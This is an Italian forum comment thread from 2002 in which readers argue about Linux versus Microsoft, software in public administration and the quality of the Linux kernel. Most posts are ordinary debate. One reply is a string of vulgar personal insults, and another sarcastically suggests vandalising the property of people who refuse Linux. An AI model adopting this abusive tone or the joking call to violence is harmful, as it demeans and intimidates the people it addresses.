- Scritto da: Pino Silvestre> > relativamente a grande parte della fuffa> > che si trova in una distribuzione media> > e nel modello di sviluppo.> incredibile, insostenibile ca$$ateeeeNeghi forse che molte distribuzioni siano piene di fuffa e che il kernel sia gestito come il bar sotto casa?AnonimoRe: lotta ai monopolisti imperialisti
tu sei quello che mesi addietro voleva denunciare i propri clienti che, probabilmente ignari, gli avevano inviato un virus ? che si "dichiarava" avvocato?Mi sa che i pinguini li hai solo visti passare in foto pubblicitarieAnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Pino Silvestre> > Ahemm, Linux (il kernel) non mi pare un> > fulgido esempio di innovazione da ricerca> > scientifica.> > E' un ottimo esempio di manutenzione> > adattativa.> ti sei visto i sorgenti?> No?e tu pino ? te li sei visti ?io li ho visti, e da programmatore con un minimo di esperienza dico che, almeno dal punto di vista della chiarezza e del coding style, sono buoni.Per caso ho avuto modo di vedere il coding style del notepad sul sito msdn, e li' si' che mi e' venuto il vomito.> > > i PC italiani NON C'E` software > > > italiano> > Perchè, Linux è Italiano?> no. linux (il kernel) e' anche italiano. Un certo Andrea Arcangeli ti dice qualcosa?Linux (il software) e' anche italiano. Un certo Simo Sorce (samba), un certo Paolo Molaro (Mono e gnome) ti dicono qualcosa ? un certo Szymon Stefanek ti dice qualcosa (e' italiano nonostante il nome) ?... e mi scuso con chi non ho nominato, ma vado di fretta.AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Pino Silvestre > se TU hai usato linux > io sono napoleone bonaparteMi sa che tu invece sei quel Troll che qualchetempo fa usava firmarsi ALIEN.> ti sei visto i sorgenti?Si.Sai, mica sei l'unico che possiedeun CD con dentro Linux e che sa leggerein listato in C.> hai posto argomentazioni zero, > come tanta gente che scrive> fuffa pro-micro$oftChi ha posto argomentazioni a zero carbonellasei tui. Non capendo un'accadi quello che ho scritto hai replicato dicendo una marea di C....tee ne vai pure fiero. Sei da ammirare.AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Mario Rossi> Infatti i prodotti di M$ sono prodotti> commerciali. Li vendono se qualcuno li> compra.non solo: anche perché attuano strategie commerciali (anche "sporche") per venderne di più e spillare più soldi> Qualcuno li compra perchè li può usare senza> diventare un "Rocket Scientist".qusta è una banalità senza senso: li comprano perché nelle scuole, nei corsi improvvisati di informatica, insegnano a pigiare il pulsante con la stampantina, a fare i grassetti e i corsivi e cazzate simili, spacciando il tutto per "Lezione di informatica"... e sempre e solo su MSOffice > > Chi parla male di linux sicuramente non> > l'ha mai> > utilizzato.> Io l'ho utilizzato, lo utilizzo (tanto),> nonostante questo ho una pessima opinione > relativamente a grande parte della fuffasi, c'è anche della fuffa> che si trova in una distribuzione media> e nel modello di sviluppo.il modello di sviluppo è fra i più efficienti mai provati> Ahemm, Linux (il kernel) non mi pare un> fulgido esempio di innovazione da ricerca> scientifica.stica%%i...> E' un ottimo esempio di manutenzione> adattativa.> i PC italiani NON C'E` software > > italiano> Perchè, Linux è Italiano?si!è anche italiano: perfino nel kernel>AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Mario Rossi> Infatti i prodotti di M$ sono prodotti> commerciali. Li vendono se qualcuno li> compra.> Qualcuno li compra perchè li può usare senza> diventare un "Rocket Scientist".per usare GNU/Linux mica devi essere un kernel hacker sai? > Io l'ho utilizzato, lo utilizzo (tanto),> nonostante questo ho una pessima opinione > relativamente a grande parte della fuffa> che si trova in una distribuzione media> e nel modello di sviluppo.a parte che non sei obbligato ad installare tutti i pacchetti che trovi in una distro, ma poi se proprio vuoi una distro che ti soddisfi te la fai tu (Linux from scratch)> Ahemm, Linux (il kernel) non mi pare un> fulgido esempio di innovazione da ricerca> scientifica.> E' un ottimo esempio di manutenzione> adattativa.concordo ma il punto non era se linux (il kernel) sia innovativo o meno.> Ed allora licenziamo tutti i dipendenti> ed al loro posto mettiamo dei nuovi assunti> che come prerequisito sappiano ricompilare> un kernel Linux :-)non si parlava di questo ma di adottare OS alternativi a win nella PA per ovvie ragioni > Perchè, Linux è Italiano?sai chi e' Andrea Arcangeli?> ma di rendo noto che, normalmente, chi usa> uno strumento, non conosce i dettagli di> costruzione ed i principi fisici che ne> determinano il > funzionamento.non e' necessario conoscere i dettagli di funzionamento di GNU/Linux per poterlo usareAnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: z2> > Perchè, Linux è Italiano?> sai chi e' Andrea Arcangeli?Tu che dici?> non e' necessario conoscere i dettagli di> funzionamento di GNU/Linux per poterlo usareStrano, a sentire le fesserie di Pino Silvestresembrerebbe di si.Ecco, Linux dovrebbe fare a meno di supporterscome lui.AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: z2> non e' necessario conoscere i dettagli di> funzionamento di GNU/Linux per poterlo usareprendi una segretaria e falle formattare un floppycon linux, poi le fai installare lo scanner e quindi scrivere un bel documento word-compatibiledopo essersi installata staroffice a pagamento e per concludere faglielo zippare.ciao.AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Mario Rossi> Ahemm, Linux (il kernel) non mi pare un> fulgido esempio di innovazione da ricerca> scientifica.> E' un ottimo esempio di manutenzione> adattativa.Non sono affatto d'accordo... prova a comparare le feature di un kernel 2.0 con quelle di un 2.4Poi fai lo stesso paragone con tutti gli altri kernel unix che trovi in giro e dimmi chi presenta il maggior supporto a features "totali".Il fatto che poi linux sia un kernel architetturalmente "alla vecchia maniera" è una questione di scelte....Linux è fatto per funzionare bene, non per sperimentare voli pindarici in c.(avevo trovato un bel paper su una architettura di OS "totale"... se lo ritrovo mando il link...)AnonimoOS Totale => lotta ai monopolisti imperialisti
- Scritto da: skull> - Scritto da: Mario Rossi> > > Ahemm, Linux (il kernel) non mi pare un> > fulgido esempio di innovazione da ricerca> > scientifica.> > E' un ottimo esempio di manutenzione> > adattativa.> > Non sono affatto d'accordo... prova a> comparare le feature di un kernel 2.0 con> quelle di un 2.4> > Poi fai lo stesso paragone con tutti gli> altri kernel unix che trovi in giro e dimmi> chi presenta il maggior supporto a features> "totali".> > Il fatto che poi linux sia un kernel> architetturalmente "alla vecchia maniera" è> una questione di scelte....> Linux è fatto per funzionare bene, non per> sperimentare voli pindarici in c.> > (avevo trovato un bel paper su una> architettura di OS "totale"... se lo ritrovo> mando il link...)se ti va mandamelo per emailgrazie, ciaoPino Silvestrel1vo8f1yv9hw08a001@sneakemail.comAnonimoRe: lotta ai monopolisti imperialisti
A parte la storia di Di Pietro ( che secondo me e` il piu` ignorante di tutti gli italioti) sono completamente d'accordo a meta` col mister !AnonimoRe: lotta ai monopolisti imperialisti
> lotta ai monopolisti imperialisti> > Solo dei ragazzini ignoranti e manager > esaltati> Chi parla male di linux sicuramente non> l'ha mai> utilizzato.Forse è proprio perche' lo ha usato!!AnonimoRe: lotta ai monopolisti imperialisti
- Scritto da: Pino Silvestre> lotta ai monopolisti imperialisti> > Solo dei ragazzini ignoranti e manager > esaltati> possono scegliere volontariamente di > abbracciare> l'imperialismo della microsoft, > abbindolati> dal marketing.> > Chi parla male di linux sicuramente non> l'ha mai> utilizzato.> > L'ignoranza dilaga, in TV non c'e`> piu`> cultura, si riduce la spesa per la > ricerca> scientifica e nessuno dice niente, > mentre se> un calciatore ultrapagato canna un > tiro> scoppiano putiferi, sprange, > scazzottamenti,> danni...> > italiani, siamo un popolo di ignoranti, > abbiamo> politici ignoranti, ce lo meritiamo, io> vorrei> sapere con questi dannati presupposti quanto> puo`> essere oculata la scelta di regalare i> dati dei> ministeri della pubblica amministrazione> alla> micro$oft in cambio di tangenti.> > Pian pianino i grossi capitali sono> riusciti a> mettere fuori uso anche Di Pietro, > hanno> smantellato il pool di mani pulite, e ci > culliamo> nelle false statistiche della > forrester> research senza renderci conto che in quasi> tutti> i PC italiani NON C'E` software > italiano, e> se micro$$$oft decide di triplicare il > prezzo> di office noi italiani siamo chinati > a 90> gradi pronti a farci sodomizzare > ovviamente> pagando con i soldi pubblici.> > Manca la competenza, la gente usa > micro$oft> perche` e` stupida, ignorante, non > ha ed> assolutamente non vuole avere la > competenza> necessaria fosse solo per distinguere > tra un> virus ed un malfunzionamento di un programma.> > Pochi qui si rendono conto di cosa voglia> dire che> Micro$$oft detiene il copyright dei > formati> con cui sono conservati i LORO dati.> > IGNORANTI IGNORANTI IGNORANTI > > Pino SilvestreCORNUTO CORNUTO TESTA DI CAZZO PEZZO DI MERDA VAFFANCULO VERME DELLA TERRA.AnonimoRe: Sono tutte cavolate
sono d'accordo: per quanto sia un sostenitore di del free software in generale e di linux in particolare, devo ammettere che Linux non è ancora pronto a soppiantare Windows nel mercato desktop. del resto lo ha detto lo stesso Linus Torvalds che ci vorranno almeno 10 anni prima che avvenga la vera e propria svolta (mi riferisco a un vecchio numero di Linux&C., non conosco la fonte originale). tuttavia, penso che certe politiche, oltre ad essere poco apprezzabili eticamente, non fanno altro che rallentarne la diffusione e quindi la conoscenza all'utenza. molto spesso uno vorrebbe provare ad usare un altro sistema ma non sa nemmeno che esiste...!la nuova politica commerciale di Microsoft: la negazione dell'evidenza!ciaogodzAnonimoLacrime...
E' una cosa che sto notando sempre più spesso; quando si parla di Microsoft vs Linux per sostenitori di quest'ultima frangia tutte le occasioni sono buone per piangere(MS è monopolista, viva la libertà, lotta al sistema capitalistico.....)Sarei curioso di sapere quanti su questo forum hanno abbraciato la causa OS contribuendo in modo attivo allo sviluppo di qualche applicativo.Quanti di voi hanno sviluppato anche una routine di OpenOffice o di Mozilla?Il mio dubbio è che difendete la causa perchè e di moda farlo ma per voi non esiste differenza tra open source e freeware.Spero di sbagliarmi ma l'aria che tira mi sembra porprio quellaNella speranza di essermi sbagliato Vi salutoAnonimoRe: Lacrime...
- Scritto da: mp75> > E' una cosa che sto notando sempre piu'> spesso; quando si parla di Microsoft vs> Linux per sostenitori di quest'ultima> frangia tutte le occasioni sono buone per> piangere(MS Monopolista, viva la liberta'> lotta al sistema capitalistico.....)E chi piange? Mi pare che Linux stia andando bene.Non mi suicido certo perche' Linux non e' in ogni computer e Bill Gates non e' un mendicante.> > Sarei curioso di sapere quanti su questo> forum hanno abbraciato la causa OS> contribuendo in modo attivo allo sviluppo di> qualche applicativo.sto sviluppando con degli amici un interprete BASIC.> Quanti di voi hanno sviluppato anche una> routine di OpenOffice o di Mozilla?Eh... magari conoscessi cosi' bene il C.> > Il mio dubbio e' che difendete la causa> perche' e' di moda farlo ma per voi non esiste> differenza tra open source e freeware.Oddio, non esiste. Diciamo che se e' free e' meglio.> > Spero di sbagliarmi ma l'aria che tira mi> sembra porprio quellasara'. Per conto mio, no.AnonimoRe: Lacrime...
- Scritto da: Blackstorm> sto sviluppando con degli amici un> interprete BASIC.interessante, almeno dal punto di vista didattico.Hai mica un link ?> Eh... magari conoscessi cosi' bene il C.idem... pero' sto provando a studiarmi bene come si lavora sotto kde.> > Il mio dubbio e' che difendete la causa> > perche' e' di moda farlo ma per voi non> esiste> > differenza tra open source e freeware.> Oddio, non esiste. Diciamo che se e' free e'> meglio.sviluppare opensource non vuol dire "no al capitalismo". Personalmente ho sviluppato e sviluppo roba opensource, alcuna per scopi di ricerca, altra per scopi commerciali. Quest'ultima me la sono fatta pagare. Certo, non sono un'azienda, sono un freelance, ma dal momento in cui un cliente mi chiede un applicativo e io glielo sviluppo, glielo concedo sotto la licenza che tuteli al massimo il suo diritto di consumatore del mio prodotto e il mio diritto di creatore del suo prodotto.> > Spero di sbagliarmi ma l'aria che tira mi> > sembra porprio quella> sara'. Per conto mio, no.nemmeno per conto mio. Penso che ci sia ancora molto da fare su linux per renderlo un sistema al meglio delle sue caratteristiche. Di lavoro da fare ce n'e'... e darei una palla per programmare come wietse venema... ma purtroppo devo accontentarmi e studiare, studiare, studiare sorgenti di altri, cercando di capire come si programma bene.AnonimoRe: Lacrime...
- Scritto da: mp75> Nella speranza di essermi sbagliato Vi salutoTi sei sbagliato.bzzz riprova e sarai piu' fortunato.AnonimoRe: Lacrime...
Razza di anguilla!- Scritto da: mp75> E' una cosa che sto notando sempre più> spesso; quando si parla di Microsoft vs> Linux per sostenitori di quest'ultima> frangia tutte le occasioni sono buone per> piangere(MS è monopolista, viva la libertà,> lotta al sistema capitalistico.....)lotta al MONOPOLIO, furbacchione di questopar de byte... non lotta al sistemacapitalistico! la gente come te la fa diventare una cosapolitica come "comunisti contro capitalisti"anziche` "monopolio contro liberta` di scegliere"e "libero mercato contro cartello ditangentisti"> Sarei curioso di sapere quanti su questo> forum hanno abbraciato la causa OS> contribuendo in modo attivo allo sviluppo di> qualche applicativo.abbraciato?utilizzarlo ed aiutare chi lo vuoleusare ti pare poco?> Quanti di voi hanno sviluppato anche una> routine di OpenOffice o di Mozilla?ecco qua, se uno non ha sviluppatoper OpenOffice non ha diritto adusare software opersource?sei uno di quelli che pensa che linuxe` solo per smanettoni haker (come dicequalche espertone) che non hanno vogliadi lavorare...> Il mio dubbio è che difendete la causa> perchè e di moda farlo ma per voi non esiste> differenza tra open source e freeware.pezzo di troll, opensource non vuol diresoftware gratis...> Spero di sbagliarmi ma l'aria che tira mi> sembra porprio quellasmettila di fumare allora> Nella speranza di essermi sbagliato Vi salutoma va...Pino Silvestrel1vo8f1yv9hw08a001@sneakemail.comAnonimoRe: Lacrime...
Caro il mio pino Silvestre non capisco questo tuo post polemico; la mia voleva essere la spiegazione di una sensazione che avverto leggendo questo forumIo di lavoro faccio il sistemista MVS e pensate un pò sul mio PC non ho neanche il mouse(non mi serve!).Linux e Unix per come la vedo io non sono affatto complessi(infatti in una partizione del mio PC è installato Linux) ma come ben sai la cultura media informatica è assai bassa.Prima di accusare qualcuno di trollare leggi con attenzione e poi rileggilo ancora e metti da parte la tua insolenza che magari cosi' riesci a imparare qualcosa.PS Conosco la differenza tra OS e freeware a differenza di molti utilizzatori di UNIX.AnonimoRe: Lacrime...
- Scritto da: mp75> > E' una cosa che sto notando sempre più> spesso; quando si parla di Microsoft vs> Linux per sostenitori di quest'ultima> frangia tutte le occasioni sono buone per> piangere(MS è monopolista, viva la libertà,> lotta al sistema capitalistico.....)> > Sarei curioso di sapere quanti su questo> forum hanno abbraciato la causa OS> contribuendo in modo attivo allo sviluppo di> qualche applicativo.> Quanti di voi hanno sviluppato anche una> routine di OpenOffice o di Mozilla?> > Il mio dubbio è che difendete la causa> perchè e di moda farlo ma per voi non esiste> differenza tra open source e freeware.> > Spero di sbagliarmi ma l'aria che tira mi> sembra porprio quella> > Nella speranza di essermi sbagliato Vi saluto> Purtroppo va sempre a finire così.Chi usa(?!) windows non capisce che senso abbia rinunciare ad un sistema perfetto, dove trovi tutto il software (il piu' delle volte piratato) che si installa da solo, che non ha bisogno di configurazioni particolari, che basta cliccare qua' e la' per farlo funzionare, e che puo' usarlo anche una scimmia.Chi usa Linux, invece, usava Windows, ma ha _deciso_ di smettere.E qui ognuno ha le sue, piu' che leggittime, ragioni. Ma c'e' chi usa Linux dicendo: "Linux=software gratis".Questi anche se non usano Linux e' lo stesso.C'e' anche il fatto che molti sostenitori di software proprietario sbandierano le straordinarie doti di un SO e di un'applicazione (sempre della stessa azienda) che, pero', non hanno pagato. Francamente rispetto piu' una persona che si sbatte a documentarsi per imparare ad usare un sistema operativo (Linux), cercando di usare tutto quello che viene messo a disposizione (liberamente e legalmente utilizzabile) dalla comunita', piuttosto di uno che usa software proprietario ma piratato.Sinceramente non vedo cause da abbracciare ma solo cose da imparare. L'importante e' che ognuno decida di testa sua. CiaoFabioAnonimoRe: Lacrime...
> Il mio dubbio è che difendete la causa> perchè e di moda farlo ma per voi non esiste> differenza tra open source e freeware.Io il mio Linux l'ho acquistato.AnonimoRe: Sono tutte cavolate
- Scritto da: Tux> Infatti l'utente> "medio" (e ce ne sono molti) non saprebbe> distinguere bene un guasto hardware da uno> software, e il suo primo pensiero sarebbe> "Ah, questi computer Compaq non funzionanoL'utente medio si è districato con interfacce caotiche come win3.x e accrocchi impossibili (come per la gestione della memoria), poi si è allenato installando e rimuovendo e reinstallando win95 a ripetizione, fino a passare notti insonni cercando di capire perchè NT dava blue screen sin dall'installazione.L'utente medio è un campione olimpico, per lui linux e la sua interfaccia è una passeggiata.Per l'utente novellino credo anch'io che l'interfaccia di XP è più semplice. È totalmente a prova di scimmia.., ma questo non vuol dire che in qualche modo la RH (Kde o Gnome in genere) possa essere un ostacolo, anzi.bye!AnonimoCentesimi rossi
Allora, il fatto risiede a quando l'attuale CEO Microsoft (il successore di zio Bill) si scagliò contro Linux e disse:Linux è un sistema mutante.Linux è un sistema antiamericano.Il primo era perchè onestamente Linux viene in tante distribuzioni mentre Windows esce in una sola distribuzione (Red Minestra :).La seconda perchè, si pensa (nessuno ha mai capito bene il perchè) gli USA si basano sul modello della libera iniziativa, del commercio e della vendita; un modello cooperativo in buona parte gratuito e dove chiunque può partecipare viene visto come comunista, ovvero rosso (ricordiamo che negli USA il comunismo è praticamente reato).Per il resto io uso BSD e vi frego.Riguardo al kernel di Linux (visto che è un argomento dibattuto) passare ad un modello a moduli (e librerie linkate) più simile a Windows porterebbe ad una perdita in velocità ma si avrebbe una maggiore upgradabilità; per il resto la colpa NON E'DI LINUX in se ma dei produttori taiwanesi che sviluppano driver per windows mentre quelli per linux se li devono fare i poveri utenti linux (beh, per lo meno nel 98% dei casi)...AnonimoImpegnamoci personalmente
Visto che dove ci sono interessi economici ci sono aziende come M$ che limitano le liberta' e boicottano la diffusione di un sistema libero per per concetto (non solo perche' non si paga ma per la sua stessa filosofia) come Linux, un grosso contribuno che tutti possiamo dare per dire NO a questi atteggiamenti potrebbe essere quello di coinvincere amici ad installare linux magari dandogli anche una mano di persona.Se ogni nuovo utente Linux dimostra la validita di questo sistema ad un amico utente widows (che a volte non sa che quella porcheria di SO che usa non e' l'unico SO esistente) convincendolo a provare un alternativa, la M$ avra' gli anni contati.AnonimoRe: Impegnamoci personalmente
- Scritto da: iono> Visto che dove ci sono interessi economicici sono anche dietro linux infatti gpl = ricchezzaAnonimoRe: Impegnamoci personalmente
- Scritto da: iono> Visto che dove ci sono interessi economici> ci sono aziende come M$ che limitano le> liberta' e boicottano la diffusione di un> sistema libero per per concetto (non solo> perche' non si paga ma per la sua stessa> filosofia) come Linux, un grosso contribuno> che tutti possiamo dare per dire NO a questi> atteggiamenti potrebbe essere quello di> coinvincere amici ad installare linux magari> dandogli anche una mano di persona.Certo. E se non lo fanno magari gli spacchiamo le finestre a sassate e gli diamo fuoco alla macchina (a Genova c'erano un sacco di amici che lo facevano...)> Se ogni nuovo utente Linux dimostra la> validita di questo sistema ad un amico> utente widows (che a volte non sa che quella> porcheria di SO che usa non e' l'unico SO> esistente) convincendolo a provare un> alternativa, la M$ avra' gli anni contati.Se volete un'alternativa a Windows, provateci con Mac. Magari avrete la vita più semplice. Prima che quell'emulazione di SO riesca ad arrivare al livello di Windows e Mac ce ne passa...AnonimoRe: Impegnamoci personalmente
- Scritto da: Darth Vader> Magari avrete la vita più> semplice. Prima che quell'emulazione di SO> riesca ad arrivare al livello di Windows e> Mac ce ne passa...Se tu non sei in grado di usare GNU Linux questo non vuol dire che sia un SO scadente.E' ora che gli utonti diventino utnti consapevoli, e' squallido che tutto si debba solo e per forza fare a colpi di click.Originale anche la tua definizione linux quale 'emulazione di SO'. Forse e' il contrario, ci sono dei buoni emulatori di Windows che girano su GNU LinuxAnonimoRe: Impegnamoci personalmente
e per sfogare la tua indicibile voglia di trollaggio hai tirato in ballo anche Genova? sei caduto veramente in basso......ma per favore, non scherzare su queste cose! sono un po' più serie delle nostre beghe... lo capisco anch'io che probabilmente sono molto più giovane di te!ciaogodzAnonimoChe icona!!!
Mio Dio..se c'e' una cosa che mi fa impazzire di P.I. e' l'icona che viene associata alla news ..Cristo, quest'ultima e' fantastica! :)ma chi le disegna?AnonimoRe: Che icona!!!
- Scritto da: alaxa> Mio Dio..se c'e' una cosa che mi fa> impazzire di P.I. e' l'icona che viene> associata alla news ..> Cristo, quest'ultima e' fantastica! :)> ma chi le disegna?Ciao!c'e' scritto in fondo ad ogni pagina eh !!! sempre lo stesso da 5 anni...peccato che ho scoperto troppo tardi che in Italia, tanto per farsi riconoscere come al solito, Monster Inc è diventato Monster & Co.ma si capisce lo stesso :)ciao!AnonimoGrazie, il tuo commento è in fase di approvazioneGrazie, il tuo commento è stato pubblicatoCommento non inviatoGrazie per esserti iscritto alla nostra newsletterOops, la registrazione alla newsletter non è andata a buon fine. Riprova.Leggi gli altri commentiPubblicato il 26 mar 2002Ti potrebbe interessare